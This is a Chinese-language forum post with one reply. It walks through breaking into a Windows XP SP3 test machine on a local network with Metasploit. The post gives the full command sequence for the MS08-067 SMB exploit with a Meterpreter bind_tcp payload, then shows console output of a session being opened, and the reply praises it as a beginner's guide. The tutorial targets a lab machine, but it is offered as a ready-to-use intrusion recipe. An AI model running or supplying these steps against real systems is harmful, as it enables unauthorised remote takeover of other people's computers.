搜索
查看: 3255|回复: 1

使用Metasploit入侵Windows

  [复制链接]

674

主题

981

帖子

2485

积分

管理员

本论坛第一帅

Rank: 9Rank: 9Rank: 9

积分
2485

热心会员推广达人宣传达人突出贡献优秀版主荣誉管理论坛元老

QQ
发表于 2018-9-20 11:13:12 | 显示全部楼层 |阅读模式
我使用Kali Linux的IP地址是192.168.0.112;在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑。
本文演示怎么使用Metasploit入侵windows xp sp3。
启动msfconsole:

 msfconsole

1.png

选择一个漏洞
 msf > search platform: windows xp sp3

2.png

exploit/windows/smb/ms08_067_netapi是08年发现的漏洞,等级Great。
查看某个漏洞的详细信息;包含使用方法、支持的平台等等,非常有帮助:

 msf > info exploit/windows/smb/ms08_067_netapi

3.png

依次执行如下命令:
 msf > use exploit/windows/smb/ms08_067_netapi
> set payload windows/meterpreter/bind_tcp
> set RHOST 192.168.0.108  (设置目标主机IP地址)
> exploit

如果目标主机有这个漏洞的话,你就可以控制它了;如果没有,尝试使用其他漏洞。


 [zxsq-anti-bbcode-*] Started bind handler
[zxsq-anti-bbcode-*] Automatically detecting the target...
[zxsq-anti-bbcode-*] Fingerprint: Windows XP SP3 - Service Pack 3 - lang:Chinese
[zxsq-anti-bbcode-*] Selected Target: Windows XP SP3 Chinese (AlwaysOn NK)
[zxsq-anti-bbcode-*] Attempting to trigger the vulnerability...
[zxsq-anti-bbcode-*] Sending stage (751104 bytes) to 192.168.0.108
[zxsq-anti-bbcode-*] Meterpreter session 1 opened (192.168.0.1:41614 -> 192.168.0.108:4444) at 2016-04-15 17:29:32

meterpreter >

4.png
有志者,事竟成,破釜沉舟,百二秦关终属楚. 苦心人,天不负, 卧薪尝胆 ,三千越甲可吞吴
回复

使用道具 举报

151

主题

250

帖子

538

积分

高级会员

中国黑客

Rank: 4

积分
538
QQ
发表于 2018-9-22 13:54:06 来自手机 | 显示全部楼层
适合新手入门
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

快速回复 返回顶部 返回列表